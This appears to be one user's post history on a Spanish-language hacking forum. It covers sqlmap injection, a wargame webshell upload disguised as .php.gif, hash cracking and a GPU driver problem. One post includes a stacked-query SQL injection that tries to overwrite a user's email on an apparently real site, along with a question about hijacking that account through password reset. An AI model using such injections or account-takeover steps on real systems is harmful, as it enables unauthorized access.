Passphrase: 6166366266626164646464636565363934663933303166306262373364633632
si me podrian ayudar porfa lo agradeceria.
#14
Dudas y pedidos generales / Re:¿Qué significa el carácter del campo password en SQLMAP?
Enero 12, 2017, 03:33:16 PM
sql men pero no entiendo por que me sale asi??
#15
Dudas y pedidos generales / ¿Qué significa el carácter del campo password en SQLMAP?
Enero 12, 2017, 03:23:40 PM
buenas tardes compañeros estoy realizando una inyeccion con sqlmap pero la clave me aparece con ese icono o no se como llamarlo que significara ?=?
aca la imagen
aca la imagen
#16
Dudas y pedidos generales / [SOLUCIONADO] Problema con wargame
Enero 09, 2017, 03:46:33 PM
Buenas tardes compañeros tengo problemas al momento de realizar el upload de la shell ya les indico por que primero mostrare las imágenes.
img n- 1
Ahí vemos las extensiones permitidas cabe destacar que eh subido varias shell eh imagenes con backdoor al momento de subir la shell la coloco como .php.gif cuando le doy subir captuo las cabeceras y edito con http tamper data o live http ya lo he realizado pero nada aun subo el archivo carga satifactoriamente pero de hay no se que mas realizar ya que no me dice en que carpeta la subio o url eh utilizado los siguientes programas
date tamper
Editando con tamper las cabeceras.
live http
wirshark
jhead
weelevy
c99.txt
webshell
He subido al mismo imagenes pero no consigo nada donde la sube simepre carga en la misma page ...
He realizado spider con proxy zzap pero no consigo nada aun..este es el code source de la pagina.
Es raro el code ya que el form no tiene action y no se dirige a ninguna pagina y no se que mas hacer si me pueden explicar o si hay un truco que no eh realizado aun por favor..
El punto es que no se como o donde se guardan los upload...o si los tiene??
img n- 1
Ahí vemos las extensiones permitidas cabe destacar que eh subido varias shell eh imagenes con backdoor al momento de subir la shell la coloco como .php.gif cuando le doy subir captuo las cabeceras y edito con http tamper data o live http ya lo he realizado pero nada aun subo el archivo carga satifactoriamente pero de hay no se que mas realizar ya que no me dice en que carpeta la subio o url eh utilizado los siguientes programas
date tamper
Editando con tamper las cabeceras.
live http
wirshark
jhead
weelevy
c99.txt
webshell
He subido al mismo imagenes pero no consigo nada donde la sube simepre carga en la misma page ...
He realizado spider con proxy zzap pero no consigo nada aun..este es el code source de la pagina.
Es raro el code ya que el form no tiene action y no se dirige a ninguna pagina y no se que mas hacer si me pueden explicar o si hay un truco que no eh realizado aun por favor..
El punto es que no se como o donde se guardan los upload...o si los tiene??
#17
Dudas y pedidos generales / Se puede montar un cluster para crack de hash? en win
Agosto 28, 2016, 08:25:45 PM
buenas noches como puedo montar un cluster en so privativo win 8 para usar como crack de hash?
#18
Dudas y pedidos generales / Re:¿Cómo obtener una clave MD5 en WordPress?
Agosto 07, 2016, 04:50:40 PM
bujnas taredes aun no eh podigfo hacer la inyeccion de update eh intentado varos metos de hex y char ejmplo
https://zxxsxxxxx.php?id=1'); updat xxxxxxxx set [email protected] where id= 1 ; -- -
pero no eh podido alguin tiene un manual o algo que me pase para investigar un poco mas ya que no se como hacerlo
https://zxxsxxxxx.php?id=1'); updat xxxxxxxx set [email protected] where id= 1 ; -- -
pero no eh podido alguin tiene un manual o algo que me pase para investigar un poco mas ya que no se como hacerlo
#19
Dudas y pedidos generales / Re:¿Cómo obtener una clave MD5 en WordPress?
Agosto 06, 2016, 11:33:34 PM
graciaas por responder tengo otra duda la post aqui paara no abrir otro en caso de ser muy fuerte la pass ya que eh intentado por fuerza bruta optimizada xD con crunch se porque lo digo!! ya eh probado
numeros del 4 al 8
letras del 4 al 8
letras y numeros 4 l y 4 n _ 6l y 2 n y aun nada todavia sigo probando
yo puedo cambiar el correo de le por el mio y recuperar contraseña ?? o inyectar otro usuario??
numeros del 4 al 8
letras del 4 al 8
letras y numeros 4 l y 4 n _ 6l y 2 n y aun nada todavia sigo probando
yo puedo cambiar el correo de le por el mio y recuperar contraseña ?? o inyectar otro usuario??
#20
Dudas y pedidos generales / ¿Cómo instalar tarjeta de video HD7770 radeo en Linux?
Agosto 06, 2016, 09:01:32 PM
Buenas tardes compañeros al momento tengo un problema con la tarjeta de video HD7770 radeo eh segido varios tutos y todos terminan mostandome la pantalla en blanco con l carita del monitor triste no h podido instalar la tarjeta de video alguien sabe como instalar bien bien los driverd == no me muestra el gnome pero por terminal si ando bien como puedo solucionar eso ==
